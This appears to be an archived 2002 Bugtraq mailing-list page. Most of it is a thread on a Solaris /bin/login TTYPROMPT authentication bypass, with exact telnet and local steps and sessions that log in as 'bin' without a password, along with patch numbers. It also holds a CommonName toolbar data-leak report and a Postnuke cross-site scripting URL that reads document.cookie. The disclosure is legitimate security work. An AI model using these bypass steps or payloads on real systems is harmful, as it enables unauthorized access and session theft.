
As you can see I get a request for a username/password.

Ramon Kagan
York University, Computing and Network Services
Unix Team -  Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]

-
I have not failed.  I have just
found 10,000 ways that don't work.
- Thomas Edison
-

On Wed, 2 Oct 2002, Jonathan S wrote:

> Hello,
>
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
>
> Example:
>
> coma% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
>
> SunOS 5.8
>
> bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> Last login: whenever
> $ whoami
> bin
>
> Jonathan Stuart
> Network Security Engineer
> Computer Consulting Partners, Ltd.
> E-mail: [EMAIL PROTECTED]
>
>

RE: CommonName Toolbar potentially exposes LAN web addresses

[Mustafa Deeb]

how can you get rid of Commonname?

Cheers

-Original Message-
From: Eric Stevens [mailto:[EMAIL PROTECTED]]
Sent: Thu, October 03, 2002 3:10 PM
To: Bugtraq; [EMAIL PROTECTED]
Subject: CommonName Toolbar potentially exposes LAN web addresses


Due to a bug in the URL validation done in CommonName Toolbar (in at least
dll version 3.5.2.0 on IE 6), addresses from local intranets may be exposed
to the CommonName organization.  It would appear on early evaluation that
valid URLs such as
http://someserver/some/path
are deemed an attempt to locate an organization named "someserver," with
reference to "some path."

The key seems to be the lack of a dot in the server name.

The danger of this is relatively low, only CommonName is exposed to this
information, and other search engines as configured by the user on the
CommonName website, and even then only after a clickthrough on the
CommonName website.  All are reputable organizations, though it does still
represent a breach in data security.

Though danger is low, annoyance factor is high, users are prevented from
accessing their Intranet unless they use a dot-included version of the
server name.

More annoying to me than the bug, and the fact that users here who had it
installed were prevented from actually being able to access our Intranet
servers, however, is that when I turned off all CommonName options, users
were still being directed to the CommonName website on Intranet requests.
Further, in an attempt to allow these users access to our Intranet again, I
closed out of all browsers and uninstalled the CommonName toolbar, restarted
the system, and found that they were still being directed to the CommonName
website on Intranet requests; my best efforts to disable the CommonName
toolbar by supplied mechanisms were futile.

The working solution was to remove all non-administrative access to the
Program Files\CommonName directory, preventing users' IE sessions from being
able to read the DLL's, and finally disabling the CommonNames auto-search
functionality.

As an asside, that caused me to stumble on an idea to proactively protect
yourself from spyware; intentionally install it, or else find out what paths
are used to install it, then deny yourself access to those paths, and even
the sneakiest spyware will be unable to install itself on your system,
unless it chooses random locations and file names.

Further testing with CommonNames toolbar is left as an exercise to those
with out a database due tomorrow (read: the user).

-MightyE

Re: Solaris 2.6, 7, 8

[Ido Dubrawsky]

On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
> Hello,
> 
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
> 
Looks like Solaris 9 is not vulnerable to this:

[idubraws@elrond idubraws]
6 $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o 192.168.155.2
Trying 192.168.155.2...
Connected to 192.168.155.2.
Escape character is '^]'.


SunOS 5.9

login:


It automatically drops you to the login prompt.  Perhaps this is fixed by a 
patch that got rolled into 9?

Ido
-- 
===
|Ido Dubrawsky   E-mail: [EMAIL PROTECTED]
 |  |   |Network Consulting Engineer
:|::|:  |VSEC Technical Marketing, SAFE Architecture
   :|||:  :|||: |Cisco Systems, Inc.
.:|||:..:|||:.  |Austin, TX. 78759
===




msg09296/pgp0.pgp
Description: PGP signature

Re: Solaris 2.6, 7, 8

[Dan Diamond]

In-Reply-To: <[EMAIL PROTECTED]>

This exploit can also be done local to gain higher priv's
tester#TTYPROMPT=aa;export TTYPROMPT
tester#exec login
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c 
c c c c c c c c c c c c c c c/n
tester:bin#

Patches to resolve are:
2.6 105665-04
2.7 112300-01
2.8 111085-01

Re: Solaris 2.6, 7, 8

[Roy Kidder]

Works like a champ on Solaris 2.6/Sparc:


-- begin --

~ $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.


SunOS 5.6

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: Thu Oct  3 14:49:33 from localhost
Sun Microsystems Inc.   SunOS 5.6   Generic August 1997
You have new mail.
bin@ovcle$ uname -a
SunOS ovcle 5.6 Generic_105181-14 sun4u sparc SUNW,Ultra-4
bin@ovcle$ who am i 
binpts/6Oct  3 15:05(localhost)

-- begin --





On Wed, 2002-10-02 at 13:23, Ramon Kagan wrote:
> Sorry but I can't reproduce this on a Solaris 7 machine.
> 
> sunlight.ccs% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> 
> 
> SunOS 5.7
> 
> login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
> Login incorrect
> 
> 
> As you can see I get a request for a username/password.
> 
> Ramon Kagan
> York University, Computing and Network Services
> Unix Team -  Intermediate System Administrator
> (416)736-2100 #20263
> [EMAIL PROTECTED]
> 
> -
> I have not failed.  I have just
> found 10,000 ways that don't work.
>   - Thomas Edison
> -
> 
> On Wed, 2 Oct 2002, Jonathan S wrote:
> 
> > Hello,
> >
> >   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> > environment variable TTYPROMPT.  This vulnerability has already been
> > reported to BugTraq and a patch has been released by Sun.
> >   However, a very simple exploit, which does not require any code to be
> > compiled by an attacker, exists.  The exploit requires the attacker to
> > simply define the environment variable TTYPROMPT to a 6 character string,
> > inside telnet. I believe this overflows an integer inside login, which
> > specifies whether or not the user has been authenticated (just a guess).
> > Once connected to the remote host, you must type the username, followed by
> > 64 " c"s, and a literal "\n".  You will then be logged in as the user
> > without any password authentication.  This should work with any account
> > except root (unless remote root login is allowed).
> >
> > Example:
> >
> > coma% telnet
> > telnet> environ define TTYPROMPT abcdef
> > telnet> o localhost
> >
> > SunOS 5.8
> >
> > bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> > Last login: whenever
> > $ whoami
> > bin
> >
> > Jonathan Stuart
> > Network Security Engineer
> > Computer Consulting Partners, Ltd.
> > E-mail: [EMAIL PROTECTED]
> >
> >
> 
-- 
===
Roy Kidder
Data Network Engineer
CoreComm
---
"...these products' frequent failures are 
legitimized by ubiquitous acquiescence." 
 -- Doc Searls on Microsoft products.
===

Re: Postnuke XSS fixed

[Sebastian Konstanty Zdrojewski]

I saw the problem has been solved, and the get you proposed below are no
more working. But if you use the following get, the popup appears again:

on the url http://news.postnuke.com/modules.php

the get

?op=modload&name=News&file=article&sid=alert(document.cookie);

Best Regars,

Sebastian

Daniel Woods wrote:

  >Humm!
  >
  >
  >
  >
  >Not so fast on the praise :(
  >
  >It only took me a couple of workarounds to find ways to bypass the check.
  >
  >  http://news.postnuke.com/modules.php
  > 
?op=modload&name=News&file=article&sid=